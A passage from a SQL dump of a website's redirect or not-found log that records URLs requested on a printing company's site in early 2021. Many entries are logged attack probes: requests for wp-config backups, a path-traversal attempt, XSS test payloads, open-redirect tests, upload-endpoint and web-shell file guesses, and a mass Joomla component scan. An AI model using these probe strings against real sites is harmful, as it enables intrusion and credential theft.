00:00:00',301),(18416,'https://ekvatorprint.com.ua/_ignition/execute-solution',NULL,'http://ekvatorprint.com.ua/_ignition/execute-solution','',7,0,'2021-01-25 02:24:18','0000-00-00 00:00:00',301),(18417,'https://ekvatorprint.com.ua//wp-config.php',NULL,'','',1,0,'2021-01-27 01:29:04','0000-00-00 00:00:00',301),(18418,'https://ekvatorprint.com.ua//wp-config-sample.php',NULL,'','',1,0,'2021-01-27 01:29:04','0000-00-00 00:00:00',301),(18419,'https://ekvatorprint.com.ua//wp-config.php.txt',NULL,'','',1,0,'2021-01-27 01:29:05','0000-00-00 00:00:00',301),(18420,'https://ekvatorprint.com.ua//wp-config.php.bak',NULL,'','',1,0,'2021-01-27 01:29:05','0000-00-00 00:00:00',301),(18421,'https://ekvatorprint.com.ua//wp-config.php.old',NULL,'','',1,0,'2021-01-27 01:29:05','0000-00-00 00:00:00',301),(18422,'https://ekvatorprint.com.ua//wp-config-backup.txt',NULL,'','',1,0,'2021-01-27 01:29:05','0000-00-00 00:00:00',301),(18423,'https://ekvatorprint.com.ua//wp-config.php.save',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18424,'https://ekvatorprint.com.ua//wp-config.php~',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18425,'https://ekvatorprint.com.ua//wp-config.php.orig',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18426,'https://ekvatorprint.com.ua//wp-config.php.original',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18427,'https://ekvatorprint.com.ua//wp-license.php?file=../..//wp-config',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18428,'https://ekvatorprint.com.ua//_wpeprivate/config.json',NULL,'','',1,0,'2021-01-27 01:29:06','0000-00-00 00:00:00',301),(18429,'https://ekvatorprint.com.ua/wp-content/db-cache.php',NULL,'','',21,0,'2021-01-28 14:39:34','0000-00-00 00:00:00',301),(18430,'https://ekvatorprint.com.ua/manifest.json',NULL,'','',8,0,'2021-01-28 14:55:34','0000-00-00 00:00:00',301),(18431,'https://ekvatorprint.com.ua/blog/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:56','0000-00-00 00:00:00',301),(18432,'https://ekvatorprint.com.ua//wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:56','0000-00-00 00:00:00',301),(18433,'https://ekvatorprint.com.ua/new/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:57','0000-00-00 00:00:00',301),(18434,'https://ekvatorprint.com.ua/backup/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:57','0000-00-00 00:00:00',301),(18435,'https://ekvatorprint.com.ua/wp/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:57','0000-00-00 00:00:00',301),(18436,'https://ekvatorprint.com.ua/old/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2021-01-29 01:20:57','0000-00-00 00:00:00',301),(18437,'https://ekvatorprint.com.ua/equipment/media/plg_content_mavikthumbnails/slimbox2/js/slimbox2.js',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:13','0000-00-00 00:00:00',301),(18438,'https://ekvatorprint.com.ua/equipment/media/jui/js/jquery-migrate.min.js?a5045587c207f1bddd97ceaecade802f',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:13','0000-00-00 00:00:00',301),(18439,'https://ekvatorprint.com.ua/equipment/media/jui/js/jquery.min.js?a5045587c207f1bddd97ceaecade802f',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:14','0000-00-00 00:00:00',301),(18440,'https://ekvatorprint.com.ua/equipment/templates/gk_ilife/lib/scripts/template_scripts.js',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:14','0000-00-00 00:00:00',301),(18441,'https://ekvatorprint.com.ua/equipment/plugins/system/jcemediabox/js/jcemediabox.js?2ee2100a9127451a41de5a4c2c62e127',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:14','0000-00-00 00:00:00',301),(18442,'https://ekvatorprint.com.ua/equipment/media/jui/js/jquery-noconflict.js?a5045587c207f1bddd97ceaecade802f',NULL,'http://ekvatorprint.com.ua','',1,0,'2021-01-29 11:48:14','0000-00-00 00:00:00',301),(18443,'https://ekvatorprint.com.ua/images/funk.txt',NULL,'','',4,0,'2021-01-30 07:22:42','0000-00-00 00:00:00',301),(18444,'https://ekvatorprint.com.ua/images/fuck.txt',NULL,'','',3,0,'2021-01-30 14:28:17','0000-00-00 00:00:00',301),(18445,'https://ekvatorprint.com.ua/bitrix/rk.php?goto=https://ya.ru',NULL,'','',3,0,'2021-01-31 12:19:12','0000-00-00 00:00:00',301),(18446,'https://ekvatorprint.com.ua/bitrix/redirect.php?goto=https://ya.ru',NULL,'','',2,0,'2021-01-31 12:19:13','0000-00-00 00:00:00',301),(18447,'https://ekvatorprint.com.ua/images/1998.txt',NULL,'','',1,0,'2021-01-31 15:27:41','0000-00-00 00:00:00',301),(18448,'https://ekvatorprint.com.ua/images/bayraktar.gif',NULL,'','',1,0,'2021-01-31 20:27:20','0000-00-00 00:00:00',301),(18449,'https://ekvatorprint.com.ua/index.php?option=com_acym&ctrl=frontmails&task=setnewiconshare',NULL,'http://www.google.com/','',18,0,'2021-02-01 03:30:52','0000-00-00 00:00:00',301),(18450,'https://ekvatorprint.com.ua/images/bilgekultigin.png',NULL,'','',1,0,'2021-02-01 07:35:45','0000-00-00 00:00:00',301),(18451,'https://ekvatorprint.com.ua/images/sht.txt',NULL,'','',1,0,'2021-02-01 13:50:58','0000-00-00 00:00:00',301),(18452,'https://ekvatorprint.com.ua/images/yo.txt',NULL,'','',1,0,'2021-02-01 17:13:12','0000-00-00 00:00:00',301),(18453,'https://ekvatorprint.com.ua/images/secure.gif',NULL,'','',1,0,'2021-02-03 15:33:07','0000-00-00 00:00:00',301),(18454,'https://ekvatorprint.com.ua/trebovaniyaнужен',NULL,'','',1,0,'2021-02-04 12:30:09','0000-00-00 00:00:00',301),(18455,'https://ekvatorprint.com.ua/wp-includes/wpconfig.bak.php?act=ul',NULL,'www.google.com','',1,0,'2021-02-06 23:43:53','0000-00-00 00:00:00',301),(18456,'https://ekvatorprint.com.ua/outdoor-advertising/wp-login.php',NULL,'','',17,0,'2021-02-07 14:50:12','0000-00-00 00:00:00',301),(18457,'https://ekvatorprint.com.ua/?q=\'>\"<svg/onload=confirm(\'testing-xss1\')>&s=\'>\"<svg/onload=confirm(\'testing-xss2\')>&search=\'>\"<svg/onload=confirm(\'testing-xss3\')>&id=\'>\"<svg/onload=confirm(\'testing-xss4\')>&action=\'>\"<svg/onload=confirm(\'testing-xss5\')>&keyword=\'>\"<svg/onload=confirm(\'testing-xss6\')>&query=\'>\"<svg/onload=confirm(\'testing-xss7\')>&page=\'>\"<svg/onload=confirm(\'testing-xss8\')>&keywords=\'>\"<svg/onload=confirm(\'testing-xss9\')>&url=\'>\"<svg/onload=confirm(\'testing-xss10\')>&view=\'>\"<svg/onload=confirm(\'testing-xss11\')>&cat=\'>\"<svg/onload=confirm(\'testing-xss12\')>&name=\'>\"<svg/onload=confirm(\'testing-xss13\')>&key=\'>\"<svg/onload=confirm(\'testing-xss14\')>&p=\'>\"<svg/onload=confirm(\'testing-xss15\')>',NULL,'http://ekvatorprint.com.ua:80/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E','',1,0,'2021-02-07 16:12:17','0000-00-00 00:00:00',301),(18458,'https://ekvatorprint.com.ua/?action=1zaazz\">&cat=2zaazz\">&id=3zaazz\">&key=4zaazz\">&keyword=5zaazz\">&keywords=6zaazz\">&name=7zaazz\">&p=8zaazz\">&page=9zaazz\">&q=10zaazz\">&query=11zaazz\">&s=12zaazz\">&search=13zaazz\">&url=14zaazz\">&view=15zaazz\">',NULL,'','',1,0,'2021-02-07 18:22:36','0000-00-00 00:00:00',301),(18459,'https://ekvatorprint.com.ua/internet-katalog-modulnykh-kartinожно',NULL,'','',1,0,'2021-02-08 13:01:00','0000-00-00 00:00:00',301),(18460,'https://ekvatorprint.com.ua/js/mage/cookies.js',NULL,'','',2,0,'2021-02-10 00:43:21','0000-00-00 00:00:00',301),(18461,'https://ekvatorprint.com.ua/images/oplata_za_zakaz/vze',NULL,'','',4,0,'2021-02-11 12:29:52','0000-00-00 00:00:00',301),(18462,'https://ekvatorprint.com.ua/printing-on-canvas -',NULL,'','',1,0,'2021-02-13 14:26:47','0000-00-00 00:00:00',301),(18463,'https://ekvatorprint.com.ua/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'http://ekvatorprint.com.ua/FCKeditor/editor/filemanager/upload/php/upload.php','',2,0,'2021-02-14 13:13:45','0000-00-00 00:00:00',301),(18464,'https://ekvatorprint.com.ua/admin/ckeditor/filemanager/connectors/php/filemanager.php',NULL,'http://ekvatorprint.com.ua/admin/ckeditor/filemanager/connectors/php/filemanager.php','',1,0,'2021-02-14 17:35:11','0000-00-00 00:00:00',301),(18465,'https://ekvatorprint.com.ua/images/canvasprice.jpg',NULL,'','',4,0,'2021-02-14 23:05:24','0000-00-00 00:00:00',301),(18466,'https://ekvatorprint.com.ua/images/canvasprice1.jpg',NULL,'','',2,0,'2021-02-14 23:05:29','0000-00-00 00:00:00',301),(18467,'https://ekvatorprint.com.ua/admin/view/javascript/plupload/examples/upload.php',NULL,'http://ekvatorprint.com.ua/admin/view/javascript/plupload/examples/upload.php','',1,0,'2021-02-14 23:52:27','0000-00-00 00:00:00',301),(18468,'https://ekvatorprint.com.ua/media/com_fabrik/css/package.css',NULL,'','',1,0,'2021-02-15 04:06:20','0000-00-00 00:00:00',301),(18469,'https://ekvatorprint.com.ua/ckeditor/filemanager/connectors/php/filemanager.php',NULL,'http://ekvatorprint.com.ua/ckeditor/filemanager/connectors/php/filemanager.php','',1,0,'2021-02-15 05:27:33','0000-00-00 00:00:00',301),(18470,'https://ekvatorprint.com.ua/fileman/conf.json',NULL,'http://ekvatorprint.com.ua/fileman/conf.json','',1,0,'2021-02-15 09:31:13','0000-00-00 00:00:00',301),(18471,'https://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'http://ekvatorprint.com.ua/admin/fckeditor/editor/filemanager/upload/php/upload.php','',1,0,'2021-02-15 12:00:30','0000-00-00 00:00:00',301),(18472,'https://ekvatorprint.com.ua/admin/filemanager/connectors/php/filemanager.php',NULL,'http://ekvatorprint.com.ua/admin/filemanager/connectors/php/filemanager.php','',1,0,'2021-02-15 14:03:27','0000-00-00 00:00:00',301),(18473,'https://ekvatorprint.com.ua/js/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'http://ekvatorprint.com.ua/js/FCKeditor/editor/filemanager/upload/php/upload.php','',1,0,'2021-02-15 23:17:13','0000-00-00 00:00:00',301),(18474,'https://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/upload.php',NULL,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/upload.php','',4,0,'2021-02-20 00:56:11','0000-00-00 00:00:00',301),(18475,'https://ekvatorprint.com.ua/blog/wp-content/plugins/translator/translator.php?l=is&u=https://ya.ru',NULL,'','',4,0,'2021-02-21 18:10:55','0000-00-00 00:00:00',301),(18476,'https://ekvatorprint.com.ua/wp-content/plugins/translator/translator.php?l=is&u=https://ya.ru',NULL,'','',3,0,'2021-02-21 18:10:56','0000-00-00 00:00:00',301),(18477,'https://ekvatorprint.com.ua/wp-content/plugins/and-antibounce/redirector.php?url=https://ya.ru',NULL,'','',4,0,'2021-02-21 18:10:57','0000-00-00 00:00:00',301),(18478,'https://ekvatorprint.com.ua/index.php?option=com_community&view=register',NULL,'','',21,0,'2021-02-22 22:43:45','0000-00-00 00:00:00',301),(18479,'https://ekvatorprint.com.ua/index.php/component/user/register.html',NULL,'','',21,0,'2021-02-22 22:43:46','0000-00-00 00:00:00',301),(18480,'https://ekvatorprint.com.ua/index.php/registration/registers',NULL,'','',21,0,'2021-02-22 22:43:46','0000-00-00 00:00:00',301),(18481,'https://ekvatorprint.com.ua/registratsiya/registers',NULL,'','',21,0,'2021-02-22 22:43:47','0000-00-00 00:00:00',301),(18482,'https://ekvatorprint.com.ua/component/comprofiler/registers.html',NULL,'','',21,0,'2021-02-22 22:43:48','0000-00-00 00:00:00',301),(18483,'https://ekvatorprint.com.ua/user/registration',NULL,'','',21,0,'2021-02-22 22:43:49','0000-00-00 00:00:00',301),(18484,'https://ekvatorprint.com.ua/index.php?option=com_secureregistration&task=register',NULL,'','',21,0,'2021-02-22 22:43:50','0000-00-00 00:00:00',301),(18485,'https://ekvatorprint.com.ua/component/option,com_comprofiler/task,registers/',NULL,'','',21,0,'2021-02-22 22:43:52','0000-00-00 00:00:00',301),(18486,'https://ekvatorprint.com.ua/index.php?option=com_registration&task=register',NULL,'','',21,0,'2021-02-22 22:43:52','0000-00-00 00:00:00',301),(18487,'https://ekvatorprint.com.ua/index.php?option=com_comprofiler&task=registers',NULL,'','',42,0,'2021-02-22 22:43:54','0000-00-00 00:00:00',301),(18488,'https://ekvatorprint.com.ua/index.php?option=com_joocm&view=register',NULL,'','',21,0,'2021-02-22 22:43:56','0000-00-00 00:00:00',301),(18489,'https://ekvatorprint.com.ua/index.php?option=com_easysocial&view=registration',NULL,'','',34,0,'2021-02-22 22:43:56','0000-00-00 00:00:00',301),(18490,'https://ekvatorprint.com.ua/downloader',NULL,'','',2,0,'2021-02-26 10:18:16','0000-00-00 00:00:00',301),(18491,'https://ekvatorprint.com.ua/templates/j3templates/j3templates.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:25:29','0000-00-00 00:00:00',301),(18492,'https://ekvatorprint.com.ua/modules/mod_jmodule/mod_j1module.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:25:43','0000-00-00 00:00:00',301),(18493,'https://ekvatorprint.com.ua/templates/jtemplate/jtemplate.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:26:15','0000-00-00 00:00:00',301),(18494,'https://ekvatorprint.com.ua/templates/jtemplate/j1template.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:26:50','0000-00-00 00:00:00',301),(18495,'https://ekvatorprint.com.ua/templates/j2template/j2template.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:26:57','0000-00-00 00:00:00',301),(18496,'https://ekvatorprint.com.ua/plugins/jplugin/j1plugin.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:27:50','0000-00-00 00:00:00',301),(18497,'https://ekvatorprint.com.ua/templates/j6templates/j6templates.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:28:49','0000-00-00 00:00:00',301),(18498,'https://ekvatorprint.com.ua/images/jlogo.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:29:01','0000-00-00 00:00:00',301),(18499,'https://ekvatorprint.com.ua/modules/mod_j2module/mod_j2module.php',NULL,'ekvatorprint.com.ua','',1,0,'2021-02-26 13:29:01','0000-00-00 00:00:00',301),(18500,'https://ekvatorprint.com.ua/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2021-02-28 05:15:31','0000-00-00 00:00:00',301),(18501,'https://ekvatorprint.com.ua/checkout',NULL,'','',1,0,'2021-02-28 05:28:56','0000-00-00 00:00:00',301),(18502,'https://ekvatorprint.com.ua/community/?foro=signup',NULL,'','',1,0,'2021-02-28 11:03:37','0000-00-00 00:00:00',301),(18503,'https://ekvatorprint.com.ua/images/portfolio/kartini/kartini-8.jpg\"); display: block;',NULL,'','',1,0,'2021-02-28 12:39:47','0000-00-00 00:00:00',301),(18504,'https://ekvatorprint.com.ua/images/branding/googleg/1x/googleg_standard_color_128dp.png',NULL,'','',2,0,'2021-03-01 11:54:17','0000-00-00 00:00:00',301),(18505,'https://ekvatorprint.com.ua/components/impo5siblexxxd35',NULL,'','',1,0,'2021-03-01 13:52:50','0000-00-00 00:00:00',301),(18506,'https://ekvatorprint.com.ua/components/com_tour',NULL,'','',1,0,'2021-03-01 13:52:50','0000-00-00 00:00:00',301),(18507,'https://ekvatorprint.com.ua/components/com_blog',NULL,'','',1,0,'2021-03-01 13:52:50','0000-00-00 00:00:00',301),(18508,'https://ekvatorprint.com.ua/components/com_alphacontent',NULL,'','',1,0,'2021-03-01 13:52:50','0000-00-00 00:00:00',301),(18509,'https://ekvatorprint.com.ua/components/com_rekry',NULL,'','',1,0,'2021-03-01 13:52:51','0000-00-00 00:00:00',301),(18510,'https://ekvatorprint.com.ua/components/com_abstract',NULL,'','',1,0,'2021-03-01 13:52:51','0000-00-00 00:00:00',301),(18511,'https://ekvatorprint.com.ua/components/com_jooproperty',NULL,'','',1,0,'2021-03-01 13:52:51','0000-00-00 00:00:00',301),(18512,'https://ekvatorprint.com.ua/components/com_clasifier',NULL,'','',1,0,'2021-03-01 13:52:51','0000-00-00 00:00:00',301),(18513,'https://ekvatorprint.com.ua/components/com_scheduling',NULL,'','',1,0,'2021-03-01 13:52:52','0000-00-00 00:00:00',301),(18514,'https://ekvatorprint.com.ua/components/com_propertylab',NULL,'','',1,0,'2021-03-01 13:52:52','0000-00-00 00:00:00',301),(18515,'https://ekvatorprint.com.ua/components/com_remository',NULL,'','',1,0,'2021-03-01 13:52:52','0000-00-00 00:00:00',301),(18516,'https://ekvatorprint.com.ua/components/com_arcadegames',NULL,'','',1,0,'2021-03-01 13:52:52','0000-00-00 00:00:00',301),(18517,'https://ekvatorprint.com.ua/components/com_storedirectory',NULL,'','',1,0,'2021-03-01 13:52:52','0000-00-00 00:00:00',301),(18518,'https://ekvatorprint.com.ua/components/com_ckforms',NULL,'','',1,0,'2021-03-01 13:52:53','0000-00-00 00:00:00',301),(18519,'https://ekvatorprint.com.ua/components/com_acctexp',NULL,'','',1,0,'2021-03-01 13:52:53','0000-00-00 00:00:00',301),(18520,'https://ekvatorprint.com.ua/components/com_perchagallery',NULL,'','',1,0,'2021-03-01 13:52:53','0000-00-00 00:00:00',301),(18521,'https://ekvatorprint.com.ua/components/com_joomrecipe',NULL,'','',1,0,'2021-03-01 13:52:53','0000-00-00 00:00:00',301),(18522,'https://ekvatorprint.com.ua/components/com_b2portfolio',NULL,'','',1,0,'2021-03-01 13:52:54','0000-00-00 00:00:00',301),(18523,'https://ekvatorprint.com.ua/components/com_fabrik',NULL,'','',2,0,'2021-03-01 13:52:54','0000-00-00 00:00:00',301),(18524,'https://ekvatorprint.com.ua/components/com_tpjobs',NULL,'','',1,0,'2021-03-01 13:52:54','0000-00-00 00:00:00',301),(18525,'https://ekvatorprint.com.ua/components/com_joomlaupdate',NULL,'','',1,0,'2021-03-01 13:52:54','0000-00-00 00:00:00',301),(18526,'https://ekvatorprint.com.ua/components/com_swmenupro',NULL,'','',1,0,'2021-03-01 13:52:54','0000-00-00 00:00:00',301),(18527,'https://ekvatorprint.com.ua/components/com_joomlaconnect_be',NULL,'','',2,0,'2021-03-01 13:52:55','0000-00-00 00:00:00',301),(18528,'https://ekvatorprint.com.ua/components/com_opencart',NULL,'','',1,0,'2021-03-01 13:52:55','0000-00-00 00:00:00',301),(18529,'https://ekvatorprint.com.ua/components/com_gamesbox',NULL,'','',1,0,'2021-03-01 13:52:55','0000-00-00 00:00:00',301),(18530,'https://ekvatorprint.com.ua/components/com_intranet',NULL,'','',1,0,'2021-03-01 13:52:55','0000-00-00 00:00:00',301),(18531,'https://ekvatorprint.com.ua/components/com_golfcourseguide',NULL,'','',1,0,'2021-03-01 13:52:56','0000-00-00 00:00:00',301),(18532,'https://ekvatorprint.com.ua/components/com_waticketsystem',NULL,'','',1,0,'2021-03-01 13:52:56','0000-00-00 00:00:00',301),(18533,'https://ekvatorprint.com.ua/components/com_surveyforce',NULL,'','',1,0,'2021-03-01 13:52:56','0000-00-00 00:00:00',301),(18534,'https://ekvatorprint.com.ua/components/com_quickfaq',NULL,'','',1,0,'2021-03-01 13:52:56','0000-00-00 00:00:00',301),(18535,'https://ekvatorprint.com.ua/components/com_gigfe',NULL,'','',1,0,'2021-03-01 13:52:56','0000-00-00 00:00:00',301),(18536,'https://ekvatorprint.com.ua/components/com_qpersonel',NULL,'','',1,0,'2021-03-01 13:52:57','0000-00-00 00:00:00',301),(18537,'https://ekvatorprint.com.ua/components/com_redshop',NULL,'','',1,0,'2021-03-01 13:52:57','0000-00-00 00:00:00',301),(18538,'https://ekvatorprint.com.ua/components/com_na_newsdescription',NULL,'','',1,0,'2021-03-01 13:52:57','0000-00-00 00:00:00',301),(18539,'https://ekvatorprint.com.ua/components/com_slider',NULL,'','',1,0,'2021-03-01 13:52:57','0000-00-00 00:00:00',301),(18540,'https://ekvatorprint.com.ua/components/com_colorlab',NULL,'','',1,0,'2021-03-01 13:52:58','0000-00-00 00:00:00',301),(18541,'https://ekvatorprint.com.ua/components/com_akobook',NULL,'','',1,0,'2021-03-01 13:52:58','0000-00-00 00:00:00',301),(18542,'https://ekvatorprint.com.ua/components/com_tupinambis',NULL,'','',1,0,'2021-03-01 13:52:58','0000-00-00 00:00:00',301),(18543,'https://ekvatorprint.com.ua/components/com_s5clanroster',NULL,'','',1,0,'2021-03-01 13:52:58','0000-00-00 00:00:00',301),(18544,'https://ekvatorprint.com.ua/components/com_magazine',NULL,'','',1,0,'2021-03-01 13:52:58','0000-00-00 00:00:00',301),(18545,'https://ekvatorprint.com.ua/components/com_simplephotogallery',NULL,'','',1,0,'2021-03-01 13:52:59','0000-00-00 00:00:00',301),(18546,'https://ekvatorprint.com.ua/components/com_inneradmission',NULL,'','',1,0,'2021-03-01 13:52:59','0000-00-00 00:00:00',301),(18547,'https://ekvatorprint.com.ua/components/com_spa',NULL,'','',1,0,'2021-03-01 13:52:59','0000-00-00 00:00:00',301),(18548,'https://ekvatorprint.com.ua/components/com_catalogue',NULL,'','',1,0,'2021-03-01 13:52:59','0000-00-00 00:00:00',301),(18549,'https://ekvatorprint.com.ua/components/com_sitemap',NULL,'','',1,0,'2021-03-01 13:53:00','0000-00-00 00:00:00',301),(18550,'https://ekvatorprint.com.ua/components/com_clantools',NULL,'','',1,0,'2021-03-01 13:53:00','0000-00-00 00:00:00',301),(18551,'https://ekvatorprint.com.ua/components/com_frontenduseraccess',NULL,'','',1,0,'2021-03-01 13:53:00','0000-00-00 00:00:00',301),(18552,'https://ekvatorprint.com.ua/components/com_universal',NULL,'','',1,0,'2021-03-01 13:53:00','0000-00-00 00:00:00',301),(18553,'https://ekvatorprint.com.ua/components/com_myalbum',NULL,'','',1,0,'2021-03-01 13:53:00','0000-00-00 00:00:00',301),(18554,'https://ekvatorprint.com.ua/components/com_donateprocess',NULL,'','',1,0,'2021-03-01 13:53:01','0000-00-00 00:00:00',301),(18555,'https://ekvatorprint.com.ua/components/com_sexypolling',NULL,'','',1,0,'2021-03-01 13:53:01','0000-00-00 00:00:00',301),(18556,'https://ekvatorprint.com.ua/components/com_portfoliogallery',NULL,'','',1,0,'2021-03-01 13:53:01','0000-00-00 00:00:00',301),(18557,'https://ekvatorprint.com.ua/components/com_rscomments',NULL,'','',1,0,'2021-03-01 13:53:01','0000-00-00 00:00:00',301),(18558,'https://ekvatorprint.com.ua/components/com_mytube',NULL,'','',1,0,'2021-03-01 13:53:02','0000-00-00 00:00:00',301),(18559,'https://ekvatorprint.com.ua/components/com_eshop',NULL,'','',1,0,'2021-03-01 13:53:02','0000-00-00 00:00:00',301),(18560,'https://ekvatorprint.com.ua/components/com_event',NULL,'','',1,0,'2021-03-01 13:53:02','0000-00-00 00:00:00',301),(18561,'https://ekvatorprint.com.ua/components/com_bazaar',NULL,'','',1,0,'2021-03-01 13:53:02','0000-00-00 00:00:00',301),(18562,'https://ekvatorprint.com.ua/components/com_medialibrary',NULL,'','',1,0,'2021-03-01 13:53:02','0000-00-00 00:00:00',301),(18563,'https://ekvatorprint.com.ua/components/com_noticeboard',NULL,'','',1,0,'2021-03-01 13:53:03','0000-00-00 00:00:00',301),(18564,'https://ekvatorprint.com.ua/components/com_djclassifieds',NULL,'','',2,0,'2021-03-01 13:53:03','0000-00-00 00:00:00',301),(18565,'https://ekvatorprint.com.ua/components/com_items',NULL,'','',1,0,'2021-03-01 13:53:03','0000-00-00 00:00:00',301),(18566,'https://ekvatorprint.com.ua/components/com_gallery_wd',NULL,'','',1,0,'2021-03-01 13:53:04','0000-00-00 00:00:00',301),(18567,'https://ekvatorprint.com.ua/components/com_djiceshoutbox',NULL,'','',1,0,'2021-03-01 13:53:04','0000-00-00 00:00:00',301),(18568,'https://ekvatorprint.com.ua/components/com_article',NULL,'','',1,0,'2021-03-01 13:53:04','0000-00-00 00:00:00',301),(18569,'https://ekvatorprint.com.ua/components/com_onlineexam',NULL,'','',1,0,'2021-03-01 13:53:04','0000-00-00 00:00:00',301),(18570,'https://ekvatorprint.com.ua/components/com_agora',NULL,'','',1,0,'2021-03-01 13:53:05','0000-00-00 00:00:00',301),(18571,'https://ekvatorprint.com.ua/components/com_econtent',NULL,'','',1,0,'2021-03-01 13:53:05','0000-00-00 00:00:00',301),(18572,'https://ekvatorprint.com.ua/components/com_dshop',NULL,'','',1,0,'2021-03-01 13:53:05','0000-00-00 00:00:00',301),(18573,'https://ekvatorprint.com.ua/components/com_libros',NULL,'','',1,0,'2021-03-01 13:53:05','0000-00-00 00:00:00',301),(18574,'https://ekvatorprint.com.ua/components/com_ultimateportfolio',NULL,'','',1,0,'2021-03-01 13:53:05','0000-00-00 00:00:00',301),(18575,'https://ekvatorprint.com.ua/components/com_szallasok',NULL,'','',1,0,'2021-03-01 13:53:06','0000-00-00 00:00:00',301),(18576,'https://ekvatorprint.com.ua/components/com_hotbrackets',NULL,'','',1,0,'2021-03-01 13:53:06','0000-00-00 00:00:00',301),(18577,'https://ekvatorprint.com.ua/components/com_sermonspeaker',NULL,'','',1,0,'2021-03-01 13:53:06','0000-00-00 00:00:00',301),(18578,'https://ekvatorprint.com.ua/components/com_jtagmembersdirectory',NULL,'','',1,0,'2021-03-01 13:53:06','0000-00-00 00:00:00',301),(18579,'https://ekvatorprint.com.ua/components/com_jresearch',NULL,'','',1,0,'2021-03-01 13:53:07','0000-00-00 00:00:00',301),(18580,'https://ekvatorprint.com.ua/components/com_jdownloads',NULL,'','',1,0,'2021-03-01 13:53:07','0000-00-00 00:00:00',301),(18581,'https://ekvatorprint.com.ua/components/com_babackup',NULL,'','',1,0,'2021-03-01 13:53:07','0000-00-00 00:00:00',301),(18582,'https://ekvatorprint.com.ua/components/com_virtualmoney',NULL,'','',1,0,'2021-03-01 13:53:07','0000-00-00 00:00:00',301),(18583,'https://ekvatorprint.com.ua/components/com_hotproperties',NULL,'','',1,0,'2021-03-01 13:53:07','0000-00-00 00:00:00',301),(18584,'https://ekvatorprint.com.ua/components/com_some',NULL,'','',1,0,'2021-03-01 13:53:08','0000-00-00 00:00:00',301),(18585,'https://ekvatorprint.com.ua/components/com_dtregister',NULL,'','',1,0,'2021-03-01 13:53:08','0000-00-00 00:00:00',301),(18586,'https://ekvatorprint.com.ua/components/com_simpleshop',NULL,'','',2,0,'2021-03-01 13:53:08','0000-00-00 00:00:00',301),(18587,'https://ekvatorprint.com.ua/components/com_hsconfig',NULL,'','',1,0,'2021-03-01 13:53:08','0000-00-00 00:00:00',301),(18588,'https://ekvatorprint.com.ua/components/com_loginbox',NULL,'','',1,0,'2021-03-01 13:53:09','0000-00-00 00:00:00',301),(18589,'https://ekvatorprint.com.ua/components/com_bsq_sitestats',NULL,'','',1,0,'2021-03-01 13:53:09','0000-00-00 00:00:00',301),(18590,'https://ekvatorprint.com.ua/components/com_xcloner-backupandrestore',NULL,'','',1,0,'2021-03-01 13:53:09','0000-00-00 00:00:00',301),(18591,'https://ekvatorprint.com.ua/components/com_hotspots',NULL,'','',1,0,'2021-03-01 13:53:09','0000-00-00 00:00:00',301),(18592,'https://ekvatorprint.com.ua/components/com_virtuemart',NULL,'','',1,0,'2021-03-01 13:53:09','0000-00-00 00:00:00',301),(18593,'https://ekvatorprint.com.ua/components/com_x-shop',NULL,'','',1,0,'2021-03-01 13:53:10','0000-00-00 00:00:00',301),(18594,'https://ekvatorprint.com.ua/components/com_mcquiz',NULL,'','',1,0,'2021-03-01 